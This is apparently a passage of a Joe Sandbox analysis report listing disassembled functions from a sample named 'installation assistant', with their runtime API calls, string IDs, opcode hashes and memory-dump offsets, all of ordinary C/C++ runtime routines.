                                • Opcode ID: d8b2ce9af6ca23b39d287f27f794cd19cdb7301d321a8ca7d0b17b1edfa8364a
                                • Instruction ID: e66f581e1d426f6db11500287d95422d623ba7d2b23dc96e6278d100bc2a46bf
                                • Opcode Fuzzy Hash: d8b2ce9af6ca23b39d287f27f794cd19cdb7301d321a8ca7d0b17b1edfa8364a
                                • Instruction Fuzzy Hash: F5C08CA312810017C306EA2598C0BAAF6A37360330F268C2EA0A2F7E43C329D0A48111
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: @$p&L$p&L$p&L$p&L$p&L$p&L$p&L$p&L
                                • API String ID: 3519838083-609671
                                • Opcode ID: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                • Instruction ID: 4065fadf75f22ee70bf94474edd1166eb3874a6b0565a3406a7a743bc7c228de
                                • Opcode Fuzzy Hash: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                • Instruction Fuzzy Hash: 77D18271A04209EFCB15CFA5DE90BEEB7B5FF05308F148519E055A7E90DB709988CBA0
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: __aulldiv$H_prolog
                                • String ID: >WJ$x$x
                                • API String ID: 2300968129-3162267903
                                • Opcode ID: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                                • Instruction ID: df0f9e2e233729e75483fa31ed01c7b27632c18847c41c15a1fdb8a507066693
                                • Opcode Fuzzy Hash: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                                • Instruction Fuzzy Hash: 3E127671900209EFDF14CFA4C980AEDBBB5FF08318F648169E919EB750DB35A999CB50
                                APIs
                                • _ValidateLocalCookies.LIBCMT ref: 6CA09B07
                                • ___except_validate_context_record.LIBVCRUNTIME ref: 6CA09B0F
                                • _ValidateLocalCookies.LIBCMT ref: 6CA09B98
                                • __IsNonwritableInCurrentImage.LIBCMT ref: 6CA09BC3
                                • _ValidateLocalCookies.LIBCMT ref: 6CA09C18
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                • String ID: csm
                                • API String ID: 1170836740-1018135373
                                • Opcode ID: 950a48116a93723893591f982474aa918089014ff9c60bb953dfc150818eb1be
                                • Instruction ID: 8bff1977d578f796cfb4b7cec00621cec8fdaf6edbba498ecbe36b7d278753bc
                                • Opcode Fuzzy Hash: 950a48116a93723893591f982474aa918089014ff9c60bb953dfc150818eb1be
                                • Instruction Fuzzy Hash: 4341E334B102199FCF00DF78D980ADE7BB5AF4636CF188155E8249BB91D735DA89CB90
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: api-ms-$ext-ms-
                                • API String ID: 0-537541572
                                • Opcode ID: 4732ff26994b2fd012e1865508e2ca2ef5de17316711fdccbddfb8a131a20509
                                • Instruction ID: 6fb23d68b77751ccfe5187088280a17fd2db46ef7b36adca31a58805004b5d5b
                                • Opcode Fuzzy Hash: 4732ff26994b2fd012e1865508e2ca2ef5de17316711fdccbddfb8a131a20509
                                • Instruction Fuzzy Hash: D721EB32A1E321ABDB214B69CC40B0A3BB8EB46768F294655E955E7FC0D770DD81C5E0
                                APIs
                                • GetConsoleCP.KERNEL32(?,6CA1B0D0,?), ref: 6CA1BEF9
                                • __fassign.LIBCMT ref: 6CA1C0D8
                                • __fassign.LIBCMT ref: 6CA1C0F5
                                • WriteFile.KERNEL32(?,6CA25AB6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CA1C13D
                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CA1C17D
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CA1C229
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: FileWrite__fassign$ConsoleErrorLast
                                • String ID:
                                • API String ID: 4031098158-0
                                • Opcode ID: d01833fcaf341943886666313c23435fd57e035e3f6b31aa1dad8c181c6dacf6
                                • Instruction ID: 5c1d36998edcf0efe099847a401bf2ab573ea5826371c31f86f2f089b2da20fd
                                • Opcode Fuzzy Hash: d01833fcaf341943886666313c23435fd57e035e3f6b31aa1dad8c181c6dacf6
                                • Instruction Fuzzy Hash: 12D1CC71E042589FCF15DFE8C9809EDBBB5BF09318F280169E855BBB01D731A98ACB50
                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 6C8D2F95
                                • std::_Lockit::_Lockit.LIBCPMT ref: 6C8D2FAF
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 6C8D2FD0
                                • __Getctype.LIBCPMT ref: 6C8D3084
                                • std::_Facet_Register.LIBCPMT ref: 6C8D309C
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 6C8D30B7
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                • String ID:
                                • API String ID: 1102183713-0
                                • Opcode ID: 6d1eac8f769a59ec274a431ace9a3f84b4c2a6b0040af483ff41a1f75491cadf
                                • Instruction ID: ba2f6b0b3660b499045baf6668c28dc96cec6f4e5623e6788b70a47febea4444
                                • Opcode Fuzzy Hash: 6d1eac8f769a59ec274a431ace9a3f84b4c2a6b0040af483ff41a1f75491cadf
                                • Instruction Fuzzy Hash: 5E417971E002148FCB24CF88DA54B9EB7B0FF65758F064528D819AB750D775AD88CF91
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: __aulldiv$__aullrem
                                • String ID:
                                • API String ID: 2022606265-0
                                • Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                • Instruction ID: 80a583a3cb7fe14dd55e751e4780dc1e97c21824858298073db8b8103e8e3a5b
                                • Opcode Fuzzy Hash: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                • Instruction Fuzzy Hash: C421D038901219FFDF208F958D40DCF7A79EF817AAF64C226B521A16D4D2718DE4C7A1
                                APIs
                                • __EH_prolog.LIBCMT ref: 6CA4A6F1
                                  • Part of subcall function 6CA59173: __EH_prolog.LIBCMT ref: 6CA59178
                                • __EH_prolog.LIBCMT ref: 6CA4A8F9
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: IJ$WIJ$J
                                • API String ID: 3519838083-740443243
                                • Opcode ID: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                                • Instruction ID: 22de7d0ac82bfabd7be2c5433ad51e685c539f20a6d3a76a733eb8cc51c1112e
                                • Opcode Fuzzy Hash: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                                • Instruction Fuzzy Hash: 81719B31A00264DFDB14CFA4C544BDDB7B2EF18308F1484A9D859ABB91DB74AE8DCB91
                                APIs
                                • _free.LIBCMT ref: 6CA25ADD
                                • _free.LIBCMT ref: 6CA25B06
                                • SetEndOfFile.KERNEL32(00000000,6CA246EC,00000000,6CA1B0D0,?,?,?,?,?,?,?,6CA246EC,6CA1B0D0,00000000), ref: 6CA25B38
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,6CA246EC,6CA1B0D0,00000000,?,?,?,?,00000000,?), ref: 6CA25B54
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: _free$ErrorFileLast
                                • String ID: 8Q
                                • API String ID: 1547350101-4022487301
                                • Opcode ID: 736e2e03bd874405c4d25c4e267ea073ae74a44742bcb1650a61d0a73e382a67
                                • Instruction ID: 947370fd928114a0deaf3c1b58e454b9d2aa436ad8a7298a11bb45612de2314f
                                • Opcode Fuzzy Hash: 736e2e03bd874405c4d25c4e267ea073ae74a44742bcb1650a61d0a73e382a67
                                • Instruction Fuzzy Hash: B041E732A00619ABDB019BE9CD85BCE3B75BF45368F2C0115E428E7B94EB38C8CD4764
                                APIs
                                • __EH_prolog.LIBCMT ref: 6CA5E41D
                                  • Part of subcall function 6CA5EE40: __EH_prolog.LIBCMT ref: 6CA5EE45
                                  • Part of subcall function 6CA5E8EB: __EH_prolog.LIBCMT ref: 6CA5E8F0
                                  • Part of subcall function 6CA5E593: __EH_prolog.LIBCMT ref: 6CA5E598
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: &qB$0aJ$A0$XqB
                                • API String ID: 3519838083-1326096578
                                • Opcode ID: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                                • Instruction ID: a2c80982635b7eb7a5abb1bc4d43c53068bb014ea642873c6564362fbdd745c8
                                • Opcode Fuzzy Hash: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                                • Instruction Fuzzy Hash: 7221BB70D01268AECF05CBE0DA959ECBBB5AF25318F204029E416A3780DF780E8CCB65
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: J$0J$DJ$`J
                                • API String ID: 3519838083-2453737217
                                • Opcode ID: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                                • Instruction ID: 44e371440cec1d91030b44896b36b07e64168c6469e9ae601ea9d070093505c9
                                • Opcode Fuzzy Hash: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                                • Instruction Fuzzy Hash: F21106B0900B64CEC720CF5AC55019AFBE4FF65708B00C91FC0A687B50C7F8A548CB99
                                APIs
                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6CA0F1B4,?,?,6CA0F235,?,?,?), ref: 6CA0F13F
                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CA0F152
                                • FreeLibrary.KERNEL32(00000000,?,?,6CA0F1B4,?,?,6CA0F235,?,?,?), ref: 6CA0F175
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: AddressFreeHandleLibraryModuleProc
                                • String ID: CorExitProcess$mscoree.dll
                                • API String ID: 4061214504-1276376045
                                • Opcode ID: bc73ad7c52e1425a4662cc960b5b13641a1e87bdce18d83fa67783b4ff053bbc
                                • Instruction ID: 6c089103de0bc9911120447c311e0d44964298c655416791246b61e6f8966db9
                                • Opcode Fuzzy Hash: bc73ad7c52e1425a4662cc960b5b13641a1e87bdce18d83fa67783b4ff053bbc
                                • Instruction Fuzzy Hash: 98F08231601619FBDF129F50DC19B9E7E78EB4535AF104054E909F2451CB318E41DB94
                                APIs
                                • __EH_prolog3.LIBCMT ref: 6CA0732E
                                • std::_Lockit::_Lockit.LIBCPMT ref: 6CA07339
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 6CA073A7
                                  • Part of subcall function 6CA07230: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6CA07248
                                • std::locale::_Setgloballocale.LIBCPMT ref: 6CA07354
                                • _Yarn.LIBCPMT ref: 6CA0736A
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                • String ID:
                                • API String ID: 1088826258-0
                                • Opcode ID: db73b707ea17a22d01ec76bab8ff9a86fe9bfbf15a0e0d45b87202a885e06f79
                                • Instruction ID: e783998f14684b4bdaacb938562fbda13e00983b83e88ca285fe57de513ce3cc
                                • Opcode Fuzzy Hash: db73b707ea17a22d01ec76bab8ff9a86fe9bfbf15a0e0d45b87202a885e06f79
                                • Instruction Fuzzy Hash: CD014C75B012109BDB06DF20D6606BD7775BFA5298B15000DD80197780DF349ACACB95
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: $!$@
                                • API String ID: 3519838083-2517134481
                                • Opcode ID: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                • Instruction ID: f58b72ce1f2253476ed9981714f51bb13f190e8b54fc1fbaa8fc28103d1ab792
                                • Opcode Fuzzy Hash: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                • Instruction Fuzzy Hash: 64126C70A16249DFDB04CFA4C590ADDBBB1FF09308F188469E845EBB51DB30A9D9CB61
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog__aulldiv
                                • String ID: $SJ
                                • API String ID: 4125985754-3948962906
                                • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                • Instruction ID: c5e610fa6f65b334411e20523464e222906061f8dc838661f822257379a00218
                                • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                • Instruction Fuzzy Hash: 1EB14FB1E002099FCB14CF99C9849EEBBB1FF48314FA4C62EE455A7B51D730AA95CB50
                                APIs
                                  • Part of subcall function 6CA07327: __EH_prolog3.LIBCMT ref: 6CA0732E
                                  • Part of subcall function 6CA07327: std::_Lockit::_Lockit.LIBCPMT ref: 6CA07339
                                  • Part of subcall function 6CA07327: std::locale::_Setgloballocale.LIBCPMT ref: 6CA07354
                                  • Part of subcall function 6CA07327: _Yarn.LIBCPMT ref: 6CA0736A
                                  • Part of subcall function 6CA07327: std::_Lockit::~_Lockit.LIBCPMT ref: 6CA073A7
                                  • Part of subcall function 6C8D2F60: std::_Lockit::_Lockit.LIBCPMT ref: 6C8D2F95
                                  • Part of subcall function 6C8D2F60: std::_Lockit::_Lockit.LIBCPMT ref: 6C8D2FAF
                                  • Part of subcall function 6C8D2F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6C8D2FD0
                                  • Part of subcall function 6C8D2F60: __Getctype.LIBCPMT ref: 6C8D3084
                                  • Part of subcall function 6C8D2F60: std::_Facet_Register.LIBCPMT ref: 6C8D309C
                                  • Part of subcall function 6C8D2F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6C8D30B7
                                • std::ios_base::_Addstd.LIBCPMT ref: 6C8D211B
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$AddstdFacet_GetctypeH_prolog3RegisterSetgloballocaleYarnstd::ios_base::_std::locale::_
                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                • API String ID: 3332196525-1866435925
                                • Opcode ID: a73638a32d15a8bdd707658de7ca8ba7a2ccf1c1433db5ad01e6f70921201e48
                                • Instruction ID: 8e9124b2c3f5fee2e6a3d97d7d3f06f4712bd5a55897cbe3e4cf374c7b03c810
                                • Opcode Fuzzy Hash: a73638a32d15a8bdd707658de7ca8ba7a2ccf1c1433db5ad01e6f70921201e48
                                • Instruction Fuzzy Hash: B441F1B0A003098FDB10CF64D9457AEBBB0FF48318F148668E919AB791E775A985CF90
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: $CK$CK
                                • API String ID: 3519838083-2957773085
                                • Opcode ID: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                                • Instruction ID: 777adb121f13231c81afb379a8bc0932f90ffed06aa2c5984c90a332c15b2cd9
                                • Opcode Fuzzy Hash: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                                • Instruction Fuzzy Hash: 9A21C870E01205CBCB04DFE9C5801EEF7B2FF94314F94862AC412E7B91D7745A968B51
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: 0$LrJ$x
                                • API String ID: 3519838083-658305261
                                • Opcode ID: 4d1a12b996d8cdd79ba2c3eb3f59f6bf691634cc710ec0f5f651f2212a36eb1c
                                • Instruction ID: 9e7ad16a6e36a84db7ad0d59a00183b2aa695c6b88d4fc14d8dec8f0fd99e1d7
                                • Opcode Fuzzy Hash: 4d1a12b996d8cdd79ba2c3eb3f59f6bf691634cc710ec0f5f651f2212a36eb1c
                                • Instruction Fuzzy Hash: 5B216536D111299ACF04DBE8CA906EDB7B5EF98348F20005AD405B3A40DF755E8CCBA1
                                APIs
                                • __EH_prolog.LIBCMT ref: 6CA64ECC
                                  • Part of subcall function 6CA4F58A: __EH_prolog.LIBCMT ref: 6CA4F58F
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: :hJ$dJ$xJ
                                • API String ID: 3519838083-2437443688
                                • Opcode ID: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                • Instruction ID: 67d8ceebdf2a36ed5ff69b48c94dde62e487a8d6fa689fd17d3134738b0126e9
                                • Opcode Fuzzy Hash: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                • Instruction Fuzzy Hash: AC21B7B0901B50CFC760CF6AC15428ABBF4BF29708B00895EC0AAD7B11E7B8A54CCF59
                                APIs
                                • SetFilePointerEx.KERNEL32(00000000,?,00000000,6CA1B0D0,6C8D1DEA,00008000,6CA1B0D0,?,?,?,6CA1AC7F,6CA1B0D0,?,00000000,6C8D1DEA), ref: 6CA1ADC9
